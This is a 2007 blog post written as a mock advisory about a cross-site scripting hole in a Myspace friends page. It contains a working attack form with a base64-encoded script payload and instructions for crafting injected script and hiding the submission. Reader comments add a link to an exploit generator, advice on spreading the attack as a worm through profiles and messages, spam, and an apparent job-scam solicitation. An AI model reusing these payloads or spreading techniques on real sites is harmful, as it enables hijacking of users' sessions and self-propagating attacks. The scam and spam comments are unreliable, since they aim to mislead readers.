momby: MOMBY-00001111: Myspace FriendsView.aspx "_

M.O.M.B.Y! (

momby) wrote,
@ 2007-04-19 22:04:00

Current mood:	chipper
Entry tags:	ajax, base64, xss

MOMBY-00001111: Myspace FriendsView.aspx "__VIEWSTATE" POST XSS
Advisory MOMBY-00001111: Myspace FriendsView.aspx "__VIEWSTATE" POST XSS

Noobz: **
LOLz: ****
0wnz: *** 1/2

An interesting find, this is an Ajax control present on all "View Friends" pages. Useful for POST-based XSS attacks (which will usually require a form posted off-site in order to trigger), this vulnerability will be exercised in a fashion similar to MOMBY-1001.

First, a simplified attack form for demo purposes:

<form name="aspnetForm" method="post" id="aspnetForm" action="http://friends.myspace.com/Modules/ViewFriends/FriendsView.aspx?%3ffuseaction=user.viewfriends&friendID=6221">
<div>
<input type="text" name="__EVENTTARGET" id="__EVENTTARGET" value="ctl00$cpMain$pagerTop" />
<input type="text" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="1" />
<input type="text" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE5MTQxOTkyMzIPZBYCZg9kFgQCAw9kFgICBg9kFgJmDxYCHgNhbHQFEVBvd2VyZWQgYnkgR29vZ2xlZAIFD2QWAgIBD2QWBAICDxYCHgdWaXNpYmxlaBYCAgUPFgIeBXZhbHVlZGQCAw9kFgJmD2QWDAIBDw8WCh4LcmVjb3JkQ291bnQCzNf3UB4IcGFnZVNpemUCKB4GcGFnZU5vAgEeD2ZpcnN0SWRQcmV2UGFnZQIKHg5sYXN0SWRQcmV2UGFnZQLdHWRkAgMPFgIeBFRleHQFfTxzY3JpcHQ+ZG9jdW1lbnQud3JpdGUoJzxoMSBhbGlnbj0iY2VudGVyIj5XaW4gQSBEYXRlIFdpdGggSGVtdSBOaWdhbSE8L2gxPjxpbWcgc3JjPWh0dHA6Ly90aW55dXJsLmNvbS8ydDc4ZGg+PC9hPicpPC9zY3JpcHQ+ZAIFDxYCHwgFCzE2OSw3MzMsMDY4ZAIJDxYCHgtfIUl0ZW1Db3VudAInFkxmD2QWBAIBDxYCHwFnZAIJDxYCHwFoZAIBD2QWAgIJDxYCHwFoZAICD2QWAgIJDxYCHwFoZAIDD2QWAgIJDxYCHwFoZAIED2QWAgIJDxYCHwFoZAIFD2QWAgIJDxYCHwFoZAIGD2QWAgIJDxYCHwFoZAIHD2QWBAIJDxYCHwFoZAILDxYCHwFnZAIID2QWBAIBDxYCHwFnZAIJDxYCHwFoZAIJD2QWAgIJDxYCHwFoZAIKD2QWAgIJDxYCHwFoZAIMD2QWAgIJDxYCHwFoZAIND2QWAgIJDxYCHwFoZAIOD2QWAgIJDxYCHwFoZAIPD2QWBAIJDxYCHwFoZAILDxYCHwFnZAIQD2QWBAIBDxYCHwFnZAIJDxYCHwFoZAIRD2QWAgIJDxYCHwFoZAISD2QWAgIJDxYCHwFoZAITD2QWAgIJDxYCHwFoZAIUD2QWAgIJDxYCHwFoZAIVD2QWAgIJDxYCHwFoZAIWD2QWAgIJDxYCHwFoZAIXD2QWBAIJDxYCHwFoZAILDxYCHwFnZAIYD2QWBAIBDxYCHwFnZAIJDxYCHwFoZAIZD2QWAgIJDxYCHwFoZAIaD2QWAgIJDxYCHwFoZAIbD2QWAgIJDxYCHwFoZAIcD2QWAgIJDxYCHwFoZAIdD2QWAgIJDxYCHwFoZAIeD2QWAgIJDxYCHwFoZAIfD2QWBAIJDxYCHwFoZAILDxYCHwFnZAIgD2QWBAIBDxYCHwFnZAIJDxYCHwFoZAIhD2QWAgIJDxYCHwFoZAIiD2QWAgIJDxYCHwFoZAIjD2QWAgIJDxYCHwFoZAIkD2QWAgIJDxYCHwFoZAIlD2QWAgIJDxYCHwFoZAImD2QWAgIJDxYCHwFoZAILDxYCHwgFFDx0ZD4mbmJzcDs8L3RkPjwvdHI+ZAINDw8WCh8DAszX91AfBAIoHwUCAR8GAgofBwLdHWRkGAEFD2N0bDAwJGNwTWFpbiRtdg8PZGZk" />
</div>
<input type="submit">
</form>

This can of course be modified to be a one-click or onLoad submit action, requiring only the page to load in the victim's browser. Screenshot of the above form in action: http://pics.livejournal.com/momby/pic/0000hw8z

In order to modify the vulnerable parameter, some base64 encoding and decoding is required. This is easily accomplished with many b64 encoders, one of the easiest to use being the online encoder at http://www.motobit.com/util/base64-decoder-encoder.asp. An attacker may take the __VIEWSTATE value, decode and save the binary, and edit the section at offset 0xdb using his favorite hex editor. This is a standard TLV (type-length-value) node, which supplies the text displayed in the Friends header box, such as |05 10|Tom's Friends... (|05| being type, |10| being length decimal 16, the length of "Tom's Friends...")

Once that's complete, the attacker may re-encode the resulting file back to a single-line base64 format, and voila! An exploit that is not only completely unfiltered at Myspace.com, but is basically impossible to detect by any other means, such as third-party XSS-filtering proxies or browser add-ons (the stealth is worth at least a half an 0wn right there).

This form and its related Ajax cousins are a rich area of unfiltered exploitation, as it is not an obvious vector for most casual XSS bug-hunters. We here at M.O.M.B.Y! hope the original reporter will take a moment to explain further his methodology in finding this bug using the anonymous comment section of this journal.

Note, though, attackers are limited to 127 characters, as the length parameter is a signed single-byte integer. That's plenty of room for evil, though; recall that elements referenced from other sites (such as <script src="www.example.com/whatever.js">) are run in the same context as the originating page, so complex scripts need not be contained in the 127 byte limit.

Credit: Richtr first reported this bug. He also claims that forms such as these may be embeded in a personal profile Friends page, implying that this can be used to launch an XSS worm. We haven't tested this implementation.

(Post a new comment)

	Niiiiice. (Anonymous) 2007-04-20 03:46 am UTC (link)
	This is the kind of bug that I've been waiting for. (Reply to this) (Thread)

	johnscism 2008-08-11 02:46 am UTC (link)
	It's been a month that I've been watching these and waiting for them to change color. Seriously, if they all take that long to turn red, I think there will be a lot of green peppers eaten at our house. (Reply to this) (Parent)

	toryfrierson 2008-08-11 10:56 am UTC (link)
	While I've been writing this article, I've been waiting for svn to finish committing tiny files to a fresh svn repository. (Reply to this) (Parent)(Thread)

	lynwoodsinkler 2008-08-11 07:49 pm UTC (link)
	While I've been writing this article, I've been waiting for svn to finish committing tiny files to a fresh svn repository. (Reply to this) (Parent)(Thread)

(Reply from suspended user)

	arturomerriton 2008-08-11 05:29 pm UTC (link)
	While I've been writing this article, I've been waiting for svn to finish committing tiny files to a fresh svn repository. (Reply to this) (Parent)

(Anonymous)
2007-04-20 09:03 am UTC (link)

Hey,

Firstly for anyone wanting to test this but doesn't want to mess with base64 i made a program:

http://rapidshare.com/files/26941067/Create_Exploit.zip.html

Which does all the work for you (needs .Net2.0)

Secondly the other pages on myspace affected by this bug are:

-Pics
-Comments
-Messages

I believe others are also infected but I havn't taken the time to test them.

The way I suggest using this exploit is that the form CAN be placed on your myspace page, all the code required is allowed to be put in your profile. So simply to spread this bug all you need to do is either:

1) Replace links on peoples pages with exploited links or.
2) Message the form around saying "Hey look at my comments: link" and once they click they will also be infected.

These viewstates can be used for other more legit things too, such as changing the amount of friends shown per page from 40 to 100.

Richtr

(Reply to this) (Thread)

	VEry very nice<img src=http://sni-labs.com/mxx.jpg></img> (Anonymous) 2007-04-20 01:58 pm UTC (link)
	Nice joB Richtr http://sni-labs.com/MOMBY .Net Framework link: http://microsoft-net-framework.softonic.com/descargar (Reply to this) (Parent)

	(Anonymous) 2008-05-31 12:04 am UTC (link)
	this is also used in adding friends now. b64 decode tho gave me slightly unusable code. i gave up on trying to figure out what to do with it, since at this point that seems useless in any sort of exploit. i've been wasting days on reading old captcha exploits, so fed up with this shit. (Reply to this) (Parent)

	rodgernutt 2008-08-06 04:54 am UTC (link)
	You can customize your profile page, add your icon, set privacy, add twitter to your mobile device or IM client, choose how you're notified of DMs, etc. (Reply to this) (Parent)

	andrealusk 2008-08-10 10:24 pm UTC (link)
	Thus, member variables can be used to store per-request data. " In order to deal with multiple requests concurrently, ASP. (Reply to this) (Parent)

	kimberlyfunke 2008-08-11 04:26 am UTC (link)
	It can also show an HTML page containing more information and links to online resources, to provide continuous guidance to developers using the package. (Reply to this) (Parent)

MOMBY-00001111
(Anonymous)
2007-04-20 01:17 pm UTC (link)

Nice one! It is a hardcore XSS vulnerability (and PoC for it). Well done Richtr.

About other holes with this vector (Pics, Comments and Messages) in addition to FriendsView - you need to test them (if I find time I'll look at them). For new bugs for MOMBY.

> He also claims that forms such as these may be embeded in a personal profile Friends page, implying that this can be used to launch an XSS worm. We haven't tested this implementation.

We need to examine and test this possibility. Because environment for XSS worm is a big security issue.

P.S.

About base64 encoding. Besides www.motobit.com's encoder/decoder (and others) you can use my XSS Generator http://websecurity.com.ua/xss_generator/ (for encoding).

Best wishes & regards,
MustLive

(Reply to this)

	Patched? (Anonymous) 2007-04-20 05:27 pm UTC (link)
	Is this patched? I copied, pasted, saved as html, and submitted but nothing happened. I replaced the third field with a basic alert (in base64 format) but it didn't run. Thanks for revealing the bug either way! (Reply to this) (Thread)

	Re: Patched? (Anonymous) 2007-04-20 05:54 pm UTC (link)
	Not patched yet. This hole is still work (in my Mozilla and IE6). The message with picture of Hemu Nigam are displaying. So try again to see it. Best wishes & regards, MustLive (Reply to this) (Parent)

	Re: Patched? (Anonymous) 2007-04-20 07:33 pm UTC (link)
	Not seeing it anymore. Was a good find none the less. Can't figure out how to implement this to where it would be effective without user interaction though. (Reply to this) (Parent)(Thread)

	kymodymu 2008-07-11 02:24 am UTC (link)
	A few days of interaction actually does make me see Microsoft as a little "less evil", simply because it's impossible to think of a company as single self-contained whole--one monolithic evil entity--once you actually know (and like and respect) some of the individuals who work there. (Reply to this) (Parent)

(Reply from suspended user)

	jewellsexton 2008-08-11 01:47 am UTC (link)
	Therefore, take your html, and copy/paste it into that itty bitty field, and it'll work. Took me about half an hour to figure that one out, hope this helps someone else. (Reply to this) (Parent)

	matthewtrotter 2008-08-11 04:01 am UTC (link)
	That includes: AJAX Thank You, AJAX revealing of HIDE-THANKS data and AJAX revealing of HIDE-REPLY data. (Reply to this) (Parent)

	Very Nice Find (Anonymous) 2007-04-20 09:04 pm UTC (link)
	Keep up the great work, this is not only a good find, but it's very interesting as well. (Reply to this)

	my quiz for all (Anonymous) 2007-05-04 04:23 am UTC (link)
	Hi You are The Best!!! Bye (Reply to this)

	Free Proxy Access (Anonymous) 2007-08-27 05:49 am UTC (link)
	Your IP address reveals your point of entry to the Internet and can be used to trace your communications back to your ISP, your employer's network, your school, a public terminal. Use our Free Web Proxy to surf the internet anonymously at http://peak40.com (Reply to this) (Thread)

	buddyspandoni 2008-08-06 04:45 am UTC (link)
	Next time we can’t find you like that, we’ll have to refer back to your photo…wait, um… So, get your hackergnotchi in to Gabe (at gabe at gundy dot org). (Reply to this) (Parent)

Hello,
(Anonymous)
2008-02-21 07:01 pm UTC (link)

I represent First Premier Financial Group inc.(FPFG inc)
our company offer you a Job, we are offering a part-time position,
flexible schedule and high salary (commission based) plus bonuses.
so,if you are interested, you can contact us via email at
gregoryddavis6@gmail.com
send resume to Fax: 323 417-4865
I'll provide you with all details concerning our position.
If you have any questions, don't hesitate to contact us.

Sincerely,
Jonathan Williams
First Premier Financial Group inc.

(Reply to this)

	........ (Anonymous) 2008-08-16 08:58 am UTC (link)
	Your blog is interesting! Keep up the good work! (Reply to this)

Username:		Create an Account Forgot your login? Login w/ OpenID
Password:
	Remember Me
	English • Español • Deutsch • Русский…

About

Help

Get Involved

Legal

Store

LJ Labs